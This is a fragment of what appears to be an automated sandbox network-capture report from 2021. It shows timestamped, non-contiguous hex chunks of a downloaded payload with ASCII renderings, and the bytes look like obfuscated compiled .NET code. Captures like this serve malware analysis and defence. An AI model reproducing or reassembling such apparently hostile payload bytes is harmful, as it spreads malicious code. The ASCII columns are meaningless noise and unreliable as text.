                                        2021-09-27 18:36:18 UTC14INData Raw: 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 22 00 14 a5 2a 00 00 01 2a 00 00 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 17 2a 00 00 00 13 30 03 00 79 00 00 00 01 00 00 11 28 1e 05 00 06 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 36 00 00 00 1b 00 00 00 05 00 00 00 37 00 00 00 38 31 00 00 00 28 b8 03 00 06 20 01 00 00 00 17 3a d6 ff ff ff 26 38 cc ff ff ff 28 c2 03 00 06 20 00 00 00 00 16 3a c0 ff ff ff 26 20 00 00 00 00 38 b5 ff ff
                                        Data Ascii: *"**0*0*0**0**0*0**0y( 8E6781( :&8( :& 8
                                        2021-09-27 18:36:18 UTC16INData Raw: 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 4c 00 00 00 05 00 00 00 1b 00 00 00 31 00 00 00 38 47 00 00 00 28 fd 03 00 06 20 03 00 00 00 16 39 d6 ff ff ff 26 38 cc ff ff ff 28 01 04 00 06 20 01 00 00 00 16 39 c0 ff ff ff 26 38 b6 ff ff ff 28 02 04 00 06 20 00 00 00 00 17 3a aa ff ff ff 26 20 00 00 00 00 38 9f ff ff ff 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 7e 00 00 00 01 00 00 11 28 1e 05 00 06 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 20 00 00 00 05 00 00 00 21 00 00 00 3c 00 00 00 38 1b 00 00 00 28 16 05 00 06 20 03 00 00 00 16 39 d6
                                        Data Ascii: 8EL18G( 9&8( 9&8( :& 8*******0*0~( 8E !<8( 9
                                        2021-09-27 18:36:18 UTC17INData Raw: 00 00 00 00 00 00 00 2a 01 1c 00 00 00 00 96 00 3d d3 00 2d 16 00 00 01 02 00 5d 00 f6 53 01 35 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 34 00 00 02 00 00 00 65 04 00 00 ca 01 00 00 2f 06 00 00 35 00 00 00 00 00 00 00 00 00 00 00 3e 01 00 00 34 00 00 00 72 01 00 00 58 05 00 00 1b 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 02 00 00 00 5f 00 00 00 c3 01 00 00 22 02 00 00 35 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 02 00 00 00 38 00 00 00 c0 01 00 00 f8 01 00 00 35 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 1c 00 00 02 00 00 00 b2 00 00 00 aa 03 00 00 5c 04 00 00 35 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 01 10 00
                                        Data Ascii: *=-]S50*A4e/5>4rX0*A_"50*A850*A\50*
                                        2021-09-27 18:36:18 UTC18INData Raw: 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00
                                        Data Ascii: ********************************
                                        2021-09-27 18:36:18 UTC20INData Raw: 00 00 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 06 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 c6 00 00 00 01 00 00 11 28 1e 05 00 06 20 04 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 06 00 00 00 42 00 00 00 20 00 00 00 05 00 00 00 43 00 00 00 33 00 00 00 59 00 00 00 38 3d 00 00 00 28 fc 04 00 06 20 05 00 00 00 16 3a ce ff ff ff 26 20 05 00 00 00 38 c3 ff ff ff 28 31 06 00 06 20 02 00 00 00 fe 0e 00 00 38 ac ff ff ff 28 14 05 00 06 20 03 00 00 00 38 a1 ff ff ff 2a 28 fd 04 00 06 20 01 00 00 00 16 39 90 ff ff ff 26 38 86 ff ff ff d0 41 00 00 02 7e 71 01 00 04 28 6d 06 00 06 7e ae 01 00 04 28 11 07 00
                                        Data Ascii: ******0*0*0( 8EB C3Y8=( :& 8(1 8( 8*( 9&8A~q(m~(
                                        2021-09-27 18:36:18 UTC21INData Raw: 11 09 11 0a 1f 0e 1f 11 1f 0f 06 28 06 05 00 06 12 0a 11 0b 11 0c 11 09 1f 0f 1f 16 1f 10 06 28 06 05 00 06 12 09 11 0a 11 0b 11 0c 17 1b 1f 11 06 28 07 05 00 06 12 0c 11 09 11 0a 11 0b 1c 1f 09 1f 12 06 28 07 05 00 06 12 0b 11 0c 11 09 11 0a 1f 0b 1f 0e 1f 13 06 28 07 05 00 06 12 0a 11 0b 11 0c 11 09 16 1f 14 1f 14 06 28 07 05 00 06 12 09 11 0a 11 0b 11 0c 1b 1b 1f 15 06 28 07 05 00 06 12 0c 11 09 11 0a 11 0b 1f 0a 1f 09 1f 16 06 28 07 05 00 06 12 0b 11 0c 11 09 11 0a 1f 0f 1f 0e 1f 17 06 28 07 05 00 06 12 0a 11 0b 11 0c 11 09 1a 1f 14 1f 18 06 28 07 05 00 06 12 09 11 0a 11 0b 11 0c 1f 09 1b 1f 19 06 28 07 05 00 06 12 0c 11 09 11 0a 11 0b 1f 0e 1f 09 1f 1a 06 28 07 05 00 06 12 0b 11 0c 11 09 11 0a 19 1f 0e 1f 1b 06 28 07 05 00 06 12 0a 11 0b 11 0c 11 09
                                        Data Ascii: (((((((((((((
                                        2021-09-27 18:36:18 UTC22INData Raw: 17 58 0b 16 13 07 16 13 08 38 2a 03 00 00 11 08 09 5d 13 09 11 08 1a 5a 13 0a 11 09 1a 5a 13 07 03 11 07 19 58 e0 91 1f 18 62 03 11 07 18 58 e0 91 1f 10 62 60 03 11 07 17 58 e0 91 1e 62 60 03 11 07 e0 91 60 13 05 20 ff 00 00 00 13 0b 16 13 0c 11 08 07 17 59 40 49 00 00 00 06 16 3e 42 00 00 00 16 13 06 11 04 11 05 58 13 04 16 13 0d 38 23 00 00 00 11 0d 16 3e 06 00 00 00 11 06 1e 62 13 06 11 06 05 05 8e 69 17 11 0d 58 59 91 60 13 06 11 0d 17 58 13 0d 11 0d 06 3f d5 ff ff ff 38 32 00 00 00 11 04 11 05 58 13 04 11 0a 13 07 05 11 07 19 58 e0 91 1f 18 62 05 11 07 18 58 e0 91 1f 10 62 60 05 11 07 17 58 e0 91 1e 62 60 05 11 07 e0 91 60 13 06 11 04 13 0e 16 13 04 11 0e 11 0e 20 20 97 58 46 fe 0e 12 00 fe 0e 13 00 20 f6 b2 4c 5e fe 0e 14 00 20 96 87 58 0c fe 0e 15
                                        Data Ascii: X8*]ZZXbXb`Xb`` Y@I>BX8#>biXY`X?82XXbXb`Xb`` XF L^ X
                                        2021-09-27 18:36:18 UTC24INData Raw: 28 4f 05 00 06 39 c2 09 00 00 20 0b 00 00 00 28 75 05 00 06 3a 64 ff ff ff 26 20 01 00 00 00 38 59 ff ff ff 00 11 33 39 4c 00 00 00 20 01 00 00 00 28 76 05 00 06 39 0a 00 00 00 26 38 00 00 00 00 fe 0c 09 00 45 02 00 00 00 26 00 00 00 05 00 00 00 38 21 00 00 00 11 33 28 71 05 00 06 20 00 00 00 00 28 75 05 00 06 39 d8 ff ff ff 26 20 00 00 00 00 38 cd ff ff ff dd ec 0a 00 00 26 20 00 00 00 00 28 75 05 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 2c 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd ba 0a 00 00 20 12 00 00 00 38 c4 fe ff ff 7e b9 00 00 04 3a f6 0a 00 00 20 01 00 00 00 28 75 05 00 06 3a ab fe ff ff 26 38 a1 fe ff ff 28 4b 05 00 06 20 07 00 00 00 38 96 fe ff ff 73 b8 00 00 0a 80 b9 00 00 04 20 11 00 00 00 38 82 fe ff ff 14 13 33 20
                                        Data Ascii: (O9 (u:d& 8Y39L (v9&8E&8!3(q (u9& 8& (u9& 8,E8 8~: (u:&8(K 8s 83
                                        2021-09-27 18:36:18 UTC25INData Raw: 00 00 00 28 66 05 00 06 26 20 24 00 00 00 38 b7 fb ff ff 11 33 28 69 05 00 06 13 35 20 22 00 00 00 38 a4 fb ff ff 11 33 28 69 05 00 06 13 07 20 28 00 00 00 38 91 fb ff ff 11 08 20 86 00 00 00 6a 28 55 05 00 06 20 0a 00 00 00 28 75 05 00 06 3a 75 fb ff ff 26 38 6b fb ff ff 11 08 11 01 11 2b 1f 28 5a 6a 58 1f 10 6a 58 28 55 05 00 06 20 41 00 00 00 28 76 05 00 06 39 4c fb ff ff 26 38 42 fb ff ff 11 32 16 8d 2d 00 00 01 16 16 28 6c 05 00 06 26 20 17 00 00 00 38 2c fb ff ff 11 28 1f 27 16 9c 20 27 00 00 00 28 76 05 00 06 39 17 fb ff ff 26 38 0d fb ff ff 11 08 11 1b 28 55 05 00 06 20 20 00 00 00 fe 0e 19 00 38 f6 fa ff ff 11 35 11 04 11 01 11 33 28 6a 05 00 06 13 00 20 25 00 00 00 38 e1 fa ff ff 11 08 28 68 05 00 06 13 26 20 1b 00 00 00 38 ce fa ff ff 11 33 28
                                        Data Ascii: (f& $83(i5 "83(i (8 j(U (u:u&8k+(ZjXjX(U A(v9L&8B2-(l& 8,(' '(v9&8(U 853(j %8(h& 83(
                                        2021-09-27 18:36:18 UTC26INData Raw: 00 00 28 76 05 00 06 39 7d ff ff ff 26 38 73 ff ff ff dd 88 00 00 00 26 20 00 00 00 00 28 75 05 00 06 3a 0a 00 00 00 26 38 00 00 00 00 fe 0c 17 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd c3 00 00 00 20 03 00 00 00 38 7d f4 ff ff d0 43 00 00 02 28 4d 05 00 06 6f a3 00 00 0a 28 72 05 00 06 28 73 05 00 06 72 62 01 00 70 28 74 05 00 06 73 40 00 00 0a 7a 16 13 2a 20 06 00 00 00 38 47 f4 ff ff 17 28 4c 05 00 06 20 13 00 00 00 28 76 05 00 06 39 32 f4 ff ff 26 38 28 f4 ff ff 16 13 2a 20 10 00 00 00 28 76 05 00 06 39 1a f4 ff ff 26 38 10 f4 ff ff 11 2a 39 b9 ff ff ff 20 0c 00 00 00 28 76 05 00 06 39 fe f3 ff ff 26 38 f4 f3 ff ff 11 2a 39 6f f5 ff ff 20 00 00 00 00 28 76 05 00 06 39 e2 f3 ff ff 26 38 d8 f3 ff ff 14 13 24 20 15 00 00 00 28 75 05 00 06 3a ca f3
                                        Data Ascii: (v9}&8s& (u:&8E8 8}C(Mo(r(srbp(ts@z* 8G(L (v92&8(* (v9&8*9 (v9&8*9o (v9&8$ (u:
                                        2021-09-27 18:36:18 UTC28INData Raw: ac 19 00 00 8e 23 00 00 ea 0d 00 00 24 28 00 00 bd 15 00 00 e8 02 00 00 68 0c 00 00 fc 01 00 00 db 19 00 00 87 13 00 00 c4 1f 00 00 93 19 00 00 db 27 00 00 75 05 00 00 f3 06 00 00 e0 22 00 00 b2 03 00 00 e9 25 00 00 21 27 00 00 89 2b 00 00 6d 2b 00 00 cc 29 00 00 6a 1b 00 00 5b 1e 00 00 ea 11 00 00 c6 10 00 00 5c 05 00 00 1d 29 00 00 d5 08 00 00 c0 12 00 00 bd 0a 00 00 fe 28 00 00 35 0d 00 00 43 0f 00 00 7d 1a 00 00 ca 1a 00 00 1c 04 00 00 cf 1b 00 00 6c 20 00 00 8d 08 00 00 7d 28 00 00 3c 10 00 00 38 05 00 00 a2 2b 00 00 26 0f 00 00 42 1e 00 00 3a 2a 00 00 bd 07 00 00 48 20 00 00 76 19 00 00 34 04 00 00 e7 07 00 00 51 11 00 00 95 06 00 00 59 06 00 00 3c 28 00 00 69 0b 00 00 cd 1d 00 00 61 15 00 00 74 0f 00 00 11 26 00 00 9f 22 00 00 b1 05 00 00 3c 16 00
                                        Data Ascii: #$(h'u"%!'+m+)j[\)(5C}l }(<8+&B:*H v4QY<(iat&"<
                                        2021-09-27 18:36:18 UTC29INData Raw: 00 20 0f 00 00 00 20 25 00 00 00 20 54 00 00 00 58 9c 20 46 00 00 00 38 6e f6 ff ff fe 0c 0a 00 20 07 00 00 00 fe 0c 21 00 9c 20 2f 00 00 00 28 76 05 00 06 39 51 f6 ff ff 26 38 47 f6 ff ff fe 0c 25 00 20 0a 00 00 00 fe 0c 31 00 9c 20 0d 01 00 00 38 33 f6 ff ff 11 14 28 54 05 00 06 16 6a 28 55 05 00 06 20 63 00 00 00 28 76 05 00 06 39 16 f6 ff ff 26 38 0c f6 ff ff 20 f7 00 00 00 20 52 00 00 00 59 fe 0e 21 00 20 6a 00 00 00 28 75 05 00 06 3a f2 f5 ff ff 26 38 e8 f5 ff ff fe 0c 0a 00 20 10 00 00 00 20 b4 00 00 00 20 3c 00 00 00 59 9c 20 58 00 00 00 28 76 05 00 06 3a c8 f5 ff ff 26 20 2f 01 00 00 38 bd f5 ff ff fe 0c 0a 00 20 18 00 00 00 fe 0c 21 00 9c 20 b5 00 00 00 28 75 05 00 06 3a a0 f5 ff ff 26 38 96 f5 ff ff fe 0c 25 00 20 08 00 00 00 fe 0c 31 00 9c 20
                                        Data Ascii: % TX F8n ! /(v9Q&8G% 1 83(Tj(U c(v9&8 RY! j(u:&8 <Y X(v:& /8 ! (u:&8% 1
                                        2021-09-27 18:36:18 UTC30INData Raw: 3a 2c f1 ff ff 26 38 22 f1 ff ff fe 0c 0a 00 20 1f 00 00 00 20 63 00 00 00 20 3c 00 00 00 58 9c 20 de 00 00 00 fe 0e 16 00 38 ff f0 ff ff 20 85 00 00 00 20 3f 00 00 00 59 fe 0e 21 00 20 02 00 00 00 38 ea f0 ff ff fe 0c 0a 00 20 12 00 00 00 fe 0c 21 00 9c 20 41 01 00 00 38 d2 f0 ff ff 20 de 00 00 00 20 4a 00 00 00 59 fe 0e 21 00 20 72 00 00 00 38 b9 f0 ff ff fe 0c 25 00 20 00 00 00 00 fe 0c 31 00 9c 20 24 01 00 00 38 a1 f0 ff ff fe 0c 25 00 20 0c 00 00 00 20 f5 00 00 00 20 51 00 00 00 59 9c 20 49 00 00 00 38 82 f0 ff ff fe 0c 0a 00 20 19 00 00 00 fe 0c 21 00 9c 20 5e 00 00 00 38 6a f0 ff ff 20 0a 00 00 00 20 32 00 00 00 58 fe 0e 21 00 20 44 01 00 00 38 51 f0 ff ff 20 5c 00 00 00 20 70 00 00 00 58 fe 0e 31 00 20 bd 00 00 00 28 75 05 00 06 3a 33 f0 ff ff 26
                                        Data Ascii: :,&8" c <X 8 ?Y! 8 ! A8 JY! r8% 1 $8% QY I8 ! ^8j 2X! D8Q \ pX1 (u:3&
                                        2021-09-27 18:36:18 UTC32INData Raw: ff fe 0c 25 00 20 0f 00 00 00 20 e8 00 00 00 20 4d 00 00 00 59 9c 20 86 00 00 00 28 76 05 00 06 39 b3 eb ff ff 26 20 28 00 00 00 38 a8 eb ff ff 20 1e 00 00 00 20 02 00 00 00 59 fe 0e 31 00 20 d7 00 00 00 38 8f eb ff ff fe 0c 25 00 20 09 00 00 00 20 47 00 00 00 20 07 00 00 00 58 9c 20 1f 00 00 00 38 70 eb ff ff fe 0c 0a 00 20 16 00 00 00 20 e0 00 00 00 20 4a 00 00 00 59 9c 20 a7 00 00 00 28 76 05 00 06 3a 4c eb ff ff 26 20 32 01 00 00 38 41 eb ff ff 20 c7 00 00 00 20 42 00 00 00 59 fe 0e 21 00 20 59 00 00 00 fe 0e 16 00 38 20 eb ff ff 20 1d 00 00 00 20 64 00 00 00 58 fe 0e 21 00 20 98 00 00 00 38 0b eb ff ff fe 0c 0a 00 20 03 00 00 00 fe 0c 21 00 9c 20 b9 00 00 00 38 f3 ea ff ff 20 f7 00 00 00 20 52 00 00 00 59 fe 0e 21 00 20 29 01 00 00 38 da ea ff ff fe
                                        Data Ascii: % MY (v9& (8 Y1 8% G X 8p JY (v:L& 28A BY! Y8 dX! 8 ! 8 RY! )8
                                        2021-09-27 18:36:18 UTC33INData Raw: 20 e0 00 00 00 20 4a 00 00 00 59 9c 20 97 00 00 00 38 c1 e6 ff ff fe 0c 0a 00 20 06 00 00 00 fe 0c 21 00 9c 20 c9 00 00 00 38 a9 e6 ff ff fe 0c 25 00 13 23 20 05 00 00 00 28 76 05 00 06 39 94 e6 ff ff 26 38 8a e6 ff ff fe 0c 25 00 20 07 00 00 00 fe 0c 31 00 9c 20 0b 00 00 00 28 76 05 00 06 39 71 e6 ff ff 26 20 06 00 00 00 38 66 e6 ff ff 20 10 00 00 00 8d 2d 00 00 01 fe 0e 25 00 20 e8 00 00 00 38 4e e6 ff ff fe 0c 25 00 20 0a 00 00 00 fe 0c 31 00 9c 20 79 00 00 00 28 76 05 00 06 39 31 e6 ff ff 26 38 27 e6 ff ff fe 0c 0a 00 20 05 00 00 00 fe 0c 21 00 9c 20 4b 00 00 00 28 76 05 00 06 39 0e e6 ff ff 26 38 04 e6 ff ff fe 0c 25 00 20 0e 00 00 00 fe 0c 31 00 9c 20 54 00 00 00 28 76 05 00 06 39 eb e5 ff ff 26 20 37 00 00 00 38 e0 e5 ff ff 20 79 00 00 00 20 74 00
                                        Data Ascii: JY 8 ! 8%# (v9&8% 1 (v9q& 8f -% 8N% 1 y(v91&8' ! K(v9&8% 1 T(v9& 78 y t
                                        2021-09-27 18:36:18 UTC34INData Raw: 9c 20 b4 00 00 00 fe 0e 16 00 38 6b e1 ff ff fe 0c 0a 00 20 1c 00 00 00 fe 0c 21 00 9c 20 51 00 00 00 28 75 05 00 06 39 52 e1 ff ff 26 20 ad 00 00 00 38 47 e1 ff ff 11 02 11 1e 11 23 28 5a 05 00 06 13 30 20 4a 01 00 00 28 76 05 00 06 39 2b e1 ff ff 26 38 21 e1 ff ff fe 0c 0a 00 20 1b 00 00 00 fe 0c 21 00 9c 20 20 01 00 00 fe 0e 16 00 38 05 e1 ff ff fe 0c 0a 00 20 09 00 00 00 fe 0c 21 00 9c 20 da 00 00 00 38 f1 e0 ff ff 20 a7 00 00 00 20 37 00 00 00 59 fe 0e 31 00 20 70 00 00 00 fe 0e 16 00 38 d0 e0 ff ff 20 a7 00 00 00 20 37 00 00 00 59 fe 0e 31 00 20 9d 00 00 00 38 bb e0 ff ff fe 0c 25 00 20 02 00 00 00 20 3f 00 00 00 20 57 00 00 00 58 9c 20 3c 00 00 00 28 76 05 00 06 3a 97 e0 ff ff 26 20 d9 00 00 00 38 8c e0 ff ff fe 0c 0a 00 20 10 00 00 00 20 5e 00 00
                                        Data Ascii: 8k ! Q(u9R& 8G#(Z0 J(v9+&8! ! 8 ! 8 7Y1 p8 7Y1 8% ? WX <(v:& 8 ^
                                        2021-09-27 18:36:18 UTC36INData Raw: 20 eb 00 00 00 20 4e 00 00 00 59 fe 0e 21 00 20 a8 00 00 00 38 0c dc ff ff fe 0c 25 00 20 0d 00 00 00 fe 0c 31 00 9c 20 53 00 00 00 28 75 05 00 06 3a ef db ff ff 26 20 02 00 00 00 38 e4 db ff ff 20 7c 00 00 00 20 36 00 00 00 58 fe 0e 21 00 20 bc 00 00 00 28 76 05 00 06 3a c6 db ff ff 26 20 e3 00 00 00 38 bb db ff ff 20 02 00 00 00 20 57 00 00 00 58 fe 0e 21 00 20 66 00 00 00 28 76 05 00 06 39 9d db ff ff 26 38 93 db ff ff fe 0c 0a 00 20 18 00 00 00 fe 0c 21 00 9c 20 c6 00 00 00 38 7f db ff ff 20 ae 00 00 00 20 3a 00 00 00 59 fe 0e 21 00 20 e7 00 00 00 28 76 05 00 06 39 61 db ff ff 26 20 5a 00 00 00 38 56 db ff ff 20 24 00 00 00 20 0c 00 00 00 58 fe 0e 31 00 20 2a 00 00 00 38 3d db ff ff 20 65 00 00 00 20 24 00 00 00 58 fe 0e 21 00 20 42 00 00 00 38 24 db
                                        Data Ascii: NY! 8% 1 S(u:& 8 | 6X! (v:& 8 WX! f(v9&8 ! 8 :Y! (v9a& Z8V $ X1 *8= e $X! B8$
                                        2021-09-27 18:36:18 UTC37INData Raw: 00 20 09 00 00 00 58 9c 20 c8 00 00 00 fe 0e 16 00 38 b2 d6 ff ff fe 0c 0a 00 20 10 00 00 00 20 ed 00 00 00 20 4f 00 00 00 59 9c 20 4a 00 00 00 28 75 05 00 06 39 92 d6 ff ff 26 20 5c 00 00 00 38 87 d6 ff ff 20 80 00 00 00 20 2a 00 00 00 59 fe 0e 21 00 20 91 00 00 00 38 6e d6 ff ff fe 0c 0a 00 20 15 00 00 00 20 7d 00 00 00 20 29 00 00 00 59 9c 20 07 01 00 00 38 4f d6 ff ff fe 0c 25 00 20 02 00 00 00 20 aa 00 00 00 20 38 00 00 00 59 9c 20 06 01 00 00 28 76 05 00 06 39 2b d6 ff ff 26 38 21 d6 ff ff 20 f7 00 00 00 20 52 00 00 00 59 fe 0e 31 00 20 6b 00 00 00 38 0c d6 ff ff fe 0c 0a 00 20 13 00 00 00 fe 0c 21 00 9c 20 61 00 00 00 fe 0e 16 00 38 ec d5 ff ff 20 77 00 00 00 20 4a 00 00 00 58 fe 0e 21 00 20 96 00 00 00 38 d7 d5 ff ff fe 0c 0a 00 20 02 00 00 00 20
                                        Data Ascii: X 8 OY J(u9& \8 *Y! 8n } )Y 8O% 8Y (v9+&8! RY1 k8 ! a8 w JX! 8
                                        2021-09-27 18:36:18 UTC38INData Raw: 6f d1 ff ff 26 38 65 d1 ff ff fe 0c 25 00 20 00 00 00 00 20 7a 00 00 00 20 2c 00 00 00 58 9c 20 8c 00 00 00 38 4a d1 ff ff fe 0c 0a 00 20 02 00 00 00 fe 0c 21 00 9c 20 ef 00 00 00 38 32 d1 ff ff fe 0c 0a 00 20 12 00 00 00 fe 0c 21 00 9c 20 0f 01 00 00 38 1a d1 ff ff fe 0c 0a 00 20 1d 00 00 00 fe 0c 21 00 9c 20 b7 00 00 00 28 75 05 00 06 3a fd d0 ff ff 26 20 32 00 00 00 38 f2 d0 ff ff fe 0c 0a 00 20 08 00 00 00 fe 0c 21 00 9c 20 c2 00 00 00 28 76 05 00 06 39 d5 d0 ff ff 26 20 bb 00 00 00 38 ca d0 ff ff fe 0c 0a 00 20 0f 00 00 00 20 1e 00 00 00 20 5b 00 00 00 58 9c 20 9b 00 00 00 28 76 05 00 06 39 a6 d0 ff ff 26 20 37 00 00 00 38 9b d0 ff ff 20 29 00 00 00 20 26 00 00 00 58 fe 0e 21 00 20 1a 00 00 00 38 82 d0 ff ff 20 98 00 00 00 20 32 00 00 00 59 fe 0e 21
                                        Data Ascii: o&8e% z ,X 8J ! 82 ! 8 ! (u:& 28 ! (v9& 8 [X (v9& 78 ) &X! 8 2Y!
                                        2021-09-27 18:36:18 UTC40INData Raw: 0a 69 6f bf 00 00 0a 0d 08 6f c0 00 00 0a 09 8e 69 16 3e 81 03 00 00 09 8e 69 1a 5d 13 04 09 8e 69 1a 5b 13 05 09 8e 69 8d 2d 00 00 01 13 06 16 13 07 16 13 08 11 04 16 3e 06 00 00 00 11 05 17 58 13 05 16 13 09 16 13 0a 38 ed 02 00 00 11 0a 1a 5a 13 0b 20 ff 00 00 00 13 0c 16 13 0d 11 0a 11 05 17 59 40 44 00 00 00 11 04 16 3e 3c 00 00 00 16 13 08 16 13 0e 38 23 00 00 00 11 0e 16 3e 06 00 00 00 11 08 1e 62 13 08 11 08 09 09 8e 69 17 11 0e 58 59 91 60 13 08 11 0e 17 58 13 0e 11 0e 11 04 3f d4 ff ff ff 38 2b 00 00 00 11 0b 13 09 09 11 09 19 58 e0 91 1f 18 62 09 11 09 18 58 e0 91 1f 10 62 60 09 11 09 17 58 e0 91 1e 62 60 09 11 09 e0 91 60 13 08 11 07 13 07 11 07 11 07 20 20 97 58 46 fe 0e 28 00 fe 0e 29 00 20 f6 b2 4c 5e fe 0e 2a 00 20 96 87 58 0c fe 0e 2b 00
                                        Data Ascii: iooi>i]i[i->X8Z Y@D><8#>biXY`X?8+XbXb`Xb`` XF() L^* X+
                                        2021-09-27 18:36:18 UTC41INData Raw: 00 11 24 7e d6 00 00 0a 11 25 6f d7 00 00 0a 11 25 17 58 13 25 11 25 11 20 3f 7f ff ff ff 11 24 7e d8 00 00 0a 6f d4 00 00 0a 11 24 11 1d 3a 0a 00 00 00 7e 73 00 00 0a 38 05 00 00 00 7e 6b 00 00 0a 11 1e 6f d9 00 00 0a 11 24 7e 67 00 00 0a 6f d4 00 00 0a 11 1a 14 11 23 06 6f da 00 00 0a 6f cc 00 00 0a 11 19 17 58 13 19 11 19 11 18 8e 69 3f f8 fd ff ff dd 06 00 00 00 26 dd 00 00 00 00 2a 41 34 00 00 02 00 00 00 14 00 00 00 f4 03 00 00 08 04 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 06 00 00 39 06 00 00 06 00 00 00 1b 00 00 01 5a 28 db 00 00 0a 39 0b 00 00 00 72 16 02 00 70 73 40 00 00 0a 7a 2a 00 13 30 04 00 34 00 00 00 59 00 00 11 20 02 00 00 00 8d 16 00 00 01 0a 06 20 00 00 00 00 fe 09 00 00 a2 06 20 01 00 00 00 fe 09 01 00 8c 0f 00 00 01
                                        Data Ascii: $~%o%X%% ?$~o$:~s8~ko$~go#ooXi?&*A499Z(9rps@z*04Y
                                        2021-09-27 18:36:18 UTC42INData Raw: 46 13 00 00 64 28 00 00 e9 18 00 00 b6 0a 00 00 da 55 00 00 71 39 00 00 64 2e 00 00 5d 0a 00 00 f9 52 00 00 89 18 00 00 3c 1d 00 00 e0 23 00 00 78 44 00 00 1c 53 00 00 38 09 00 00 b5 1a 00 00 3a 3f 00 00 b3 38 00 00 fd 25 00 00 5b 3a 00 00 72 24 00 00 43 01 00 00 43 2f 00 00 4e 14 00 00 eb 41 00 00 20 12 00 00 1b 3f 00 00 c4 0f 00 00 10 3f 00 00 7d 14 00 00 5d 3b 00 00 d0 08 00 00 41 45 00 00 aa 1f 00 00 1b 0c 00 00 a1 37 00 00 4e 55 00 00 12 15 00 00 1c 4a 00 00 cf 32 00 00 ec 48 00 00 f8 1d 00 00 c5 03 00 00 99 09 00 00 f5 36 00 00 ff 50 00 00 4e 20 00 00 c0 51 00 00 97 15 00 00 84 29 00 00 7d 53 00 00 2b 0c 00 00 b7 39 00 00 11 0b 00 00 19 3a 00 00 76 52 00 00 2e 05 00 00 85 22 00 00 37 4c 00 00 ab 0c 00 00 29 1e 00 00 f8 0a 00 00 a8 00 00 00 fc 07 00
                                        Data Ascii: Fd(Uq9d.]R<#xDS8:?8%[:r$CC/NA ??}];AE7NUJ2H6PN Q)}S+9:vR."7L)
                                        2021-09-27 18:36:18 UTC44INData Raw: 18 00 00 e2 1c 00 00 69 45 00 00 3e 16 00 00 e1 53 00 00 2b 44 00 00 86 3d 00 00 07 10 00 00 53 3f 00 00 05 00 00 00 1a 52 00 00 8c 3b 00 00 c2 17 00 00 e1 3d 00 00 79 33 00 00 86 4b 00 00 3b 0b 00 00 64 3f 00 00 24 25 00 00 ef 2f 00 00 87 57 00 00 e0 46 00 00 9d 4c 00 00 8c 56 00 00 b5 4c 00 00 46 31 00 00 bc 09 00 00 7f 0b 00 00 ca 54 00 00 b0 3d 00 00 75 10 00 00 f6 39 00 00 0b 49 00 00 a6 31 00 00 12 45 00 00 46 36 00 00 ef 05 00 00 29 39 00 00 b2 4a 00 00 8d 1f 00 00 8e 23 00 00 14 10 00 00 d3 22 00 00 36 56 00 00 3f 4b 00 00 1a 19 00 00 57 3d 00 00 d3 13 00 00 73 30 00 00 b1 04 00 00 bf 2e 00 00 d8 21 00 00 bd 24 00 00 5a 4a 00 00 1c 09 00 00 e9 09 00 00 92 47 00 00 19 54 00 00 cb 23 00 00 82 51 00 00 bc 47 00 00 a4 48 00 00 58 06 00 00 01 11 00 00
                                        Data Ascii: iE>S+D=S?R;=y3K;d?$%/WFLVLF1T=u9I1EF6)9J#"6V?KW=s0.!$ZJGT#QGHX
